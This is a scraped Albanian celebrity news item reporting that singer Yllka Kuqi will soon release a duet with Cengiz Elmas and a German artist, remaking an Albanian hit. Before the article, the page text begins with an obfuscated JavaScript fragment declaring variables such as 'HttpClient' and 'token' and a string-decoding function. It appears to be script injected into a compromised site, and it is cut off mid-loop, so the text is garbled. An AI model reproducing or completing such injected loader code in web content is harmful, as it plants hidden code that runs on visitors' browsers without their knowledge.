;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nuk ndalen bashkëpunimet me artistë të huaj: Yllka Kuqi, së shpejti me risi!

By

Duetet internacionale janë trendi i kësaj vere në diskografinë shqiptare.

Ishte Dhurata që e nisi me këngën ‘Zemër’ në bashkëpunim me Soolking, një sukses i jashtëzakonshëm, për të vazhduar me artistë të tjerë përfshirë Dafina Zeqirin e cila solli këngën ‘Desole por favor’ me DJ Hamida dhe Aymane Serhane.

Por, nëse menduat se me kaq mbaruan bashkëpunimet me artistë të huaj, gaboheni.

Prive.al ka arritur të mësojë që këngëtarja Yllka Kuqi shumë shpejt do të sjellë një bashkëpunim me Cengiz Elmas dhe një tjetër artist gjerman Baby Broën, të njohur në tregun muzikor turko-gjerman.

LAJMI VIJON NËN FOTO

Kënga do të jetë ripërpunim i një hiti të pavdekshëm shqiptar dhe pritet të publikohet shumë shpejt meqenëse shumica e punëve në projekt kanë përfunduar. Tashmë na mbetet vetëm të presim. /Prive.al

Artikuj të ngjashëm